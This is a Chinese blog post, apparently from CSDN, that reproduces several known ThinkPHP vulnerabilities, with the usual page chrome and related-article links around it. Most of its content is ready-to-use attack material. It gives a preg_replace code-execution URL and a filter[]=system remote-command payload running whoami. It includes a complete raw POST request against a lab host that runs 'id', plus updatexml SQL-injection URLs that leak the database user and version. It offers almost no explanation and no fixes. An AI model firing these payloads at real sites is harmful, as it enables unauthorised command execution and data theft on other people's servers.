ThinkPHP框架漏洞 远程代码执行/SQL注入/信息泄露复现(附检测工具)

最新推荐文章于 2024-07-25 15:08:38 发布
最新推荐文章于 2024-07-25 15:08:38 发布
阅读量4.8k 收藏 9
点赞数 3
分类专栏: 中间件安全 文章标签: sql php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/123105060
版权

0x00 thinkphp简介

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。

0x01 ThinkPHP 2.x 3.x 任意代码执行

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由,
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞,ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

payload:/index.php?s=/index/index/name/$%7B@phpinfo()%7D

0x02 Thinkphp5 5.0.22/5.1.29 远程代码执行

漏洞位置:/index.php?s=captcha
payload:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

0x03 ThinkPHP5 5.0.23远程代码执行


POC:post请求

POST /index.php?s=captcha HTTP/1.1
Host: 192.168.222.134:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

0X04 ThinkPHP5 SQL注入漏洞/信息泄露

信息泄露payload:/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1


sql注入payload:/index.php?ids[0,updatexml(0,concat(0xa,@@version),0)]=1


ThinkPHP 检测工具:https://github.com/Lucifer1993/TPscan

告白热
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
开发知识点-Thinkphp框架
aming小老弟
10-11 453
作为一个整体开发解决方案,ThinkPHP能够解决应用开发中的大多数需要,因为其自身包含了底层架构、兼容处理、基类库、数据库访问层、模板引擎、缓存机制、插件机制、角色认证、表单处理等常用的组件,并且对于跨版本、跨平台和跨数据库移植都比较方便。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQLSqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。
渗透测试-ThinkPHP框架漏洞总结
lza20001103的博客
08-28 1406
ThinkPHP框架漏洞总结 文章目录ThinkPHP框架漏洞总结前言Thinkphp简介Thinkphp本地安装Thinkphp本地验证poc写入一句话Vulhub-ThinkphpThinkphp 2.x 任意代码执行漏洞Thinkphp5-5.0.22/5.1.29远程执行代码漏洞Thinkphp5.0.23远程代码执行漏洞Thinkphp5 SQL注入漏洞和敏感信息泄露漏洞Thinkphp自动化武器Thinkphp综合利用工具![在这里插入图片描述](https://img-blog.csd
PHP 开发 框架安全:ThinkPHP 序列 漏洞测试.
Innocence_0的博客
06-04 501
本身不断更新和改进,以应对新的安全威胁和漏洞。什么是 ThinkPHP 框架.ThinkPHP 框架的安全特性:开启 漏洞 靶场:(1)查看目录:(2)启用 vulhub 漏洞:(3)进行浏览:主机的 8080 端口.进行 漏洞 测试:(1)查看是不是 ThinkPHP 框架.(查看数据包的信息)(2)如果知道他是这个漏洞,则可以自己使用工具进行测试。(3)漏洞的利用:(4)使用连接工具(蚁剑)进行连接.
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 7498
服务框架是指某领域一类服务的可用设计与不完整的实,与软件框架不同的是,服务框架同时体着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
[Vulhub] ThinkPHP漏洞合集
weixin_45605352的博客
05-11 2427
0x01 环境 攻击机:kali linux,Windows 10 x64 靶机:XXE(下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/) 网络设置:均为桥接模式 0x02 漏洞 主机发&端口扫描 先确定靶机ip地址,这里用arp-scan -l命令探测内网: 发靶机地址为192.168.43.228,接下来用nmap -sV -p- 192.168.43.228 扫描一下: -sV:探测端口服务版本;-p:指定端口;-v:显示扫描过
Thinkphp常见漏洞总结
weixin_46622976的博客
07-12 5342
ThinkPHP漏洞整理
Think.PHP框架漏洞
m0_71300782的博客
09-13 968
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
ThinkPHP历史漏洞
xlsj雪松的博客
03-09 435
1 ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持 windows/Unix/Linux等服务器环境。
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3827
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQLSqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架
开发框架漏洞
weixin_56378389的博客
04-15 632
Struts2;Thinkphp
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
10-25
主要介绍了对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析,对于网站安全十分重要!需要的朋友可以参考下
ThinkPHP框架任意代码执行漏洞的利用及其修方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修方法,该漏洞的修对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
thinkPHP框架执行原生SQL语句的方法
10-19
ThinkPHP框架提供了方便的接口来执行这些原生SQL,这使得开发者能够灵活地利用数据库的强大功能。本篇文章将深入探讨如何在ThinkPHP执行原生SQL语句,并对比`query()`和`execute()`这两个方法的使用场景和差异。 ...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
解开基于大模型的Text2SQL的神秘面纱
最新发布
shengjk1的博客
07-25 804
本文介绍了NL2SQL的实方式,包括目前比较火的开源项目Vanna、DAIL-SQL以及其他实方式,同时总结了当前NL2SQL方式的优化点。此外,本文还介绍了Text-to-SQL测试集WikiSQL、Spider和BIRD,以及评估模型性能的指标Spider Exact Match和Spider Exact Execution。
数据库 执行sql添加删除字段
m0_60873265的博客
07-25 276
ALTER TABLE 表明 ADD COLUMN 字段名 类型 DEFAULT NULL COMMENT 注释 AFTER 哪个字段后面;ALTER TABLE 表明 DROP COLUMN 字段;
会Excel就会sql
svygh123的专栏
07-20 1523
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发它非常高效且强大,特别是在处理大量数据和执行杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值